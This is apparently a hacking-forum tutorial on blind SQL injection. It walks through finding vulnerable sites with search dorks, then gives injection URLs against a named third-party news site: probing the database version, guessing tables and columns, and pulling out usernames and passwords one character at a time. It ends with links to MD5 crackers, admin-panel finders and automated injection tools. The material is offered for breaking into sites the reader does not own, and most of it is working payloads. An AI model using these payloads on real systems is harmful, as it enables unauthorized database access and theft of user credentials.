Hack Website using Blind SQL INJECTION

S0.6 - Blind SQL Injection

Let me start of by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Lets get started anyway. I found a site which I could use union based injection on so I wouldn't have to guess the table names, which made this tutorial alot easier to write.

First of all we will want to find a site using dorks, mentioned erlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based, i'll make a tutorial for that soon).
When we have our site, with a vulnerable parameter, you will want to test if it is vulnerable. We can do this by adding "and 1=1" onto the end of our url, and if it loads normally then thats good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.

Code:

http://www.giacusa.com/news.php?newsid=126 and 1=1

< no error

Code:

http://www.giacusa.com/news.php?newsid=126 and 1=2

< doesn't load properly

It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use

Code:

and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version there. Most sites would either use 4 or 5. Using what i said erlier, if the version is false, it won't load correctly. If it is true, it will.

Code:

http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4

< doesn't load properly

Code:

http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5

< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example as, I just quickly got the tables/columns doing it that way to make the tutorial simple. But otherwise you would have to guess it. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:

http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1

< page doesn't load correctly.

Code:

http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1

< page doesn't load correctly.

Code:

http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1

< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:

http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1

< doesn't load properly

Code:

http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1

< doesn't load properly

Code:

http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1

< loads fine. There is a column named category.

After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one in ascii. So "test" = "74 65 73 74". You can find an ascii chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the hackbar addon for firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -

Code:

ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:

and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64

should load normally. because most sited wouldn't allow "@" in the username, but it's possible. @ = 64 in ascii. Since it loads normally you know it is greater than 64.

Code:

and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105

will load normally, because the "j" in john = 106 in ascii.

Code:

and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106

will return an error, because "j" is not greater than 106. It is 106. It's like finding columns really. So after we know it is 106 in ascii, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:

and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110

will load normally, because the "o" in john is greater than 110. It's 111. So

Code:

and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>111

will return an error because o is equal to 111, not greater. But since you get nothing at 110, you know it's 111. So now you have the first two characters, just keep repeating this untill you get an error no matter what, then you will know that you have the full username. Then after you have done that move to a different column, such as password :). Like I said this can be really time consuming, this is probabally one of the only times I'd use a tool personally.

---

---

---

Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves alot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.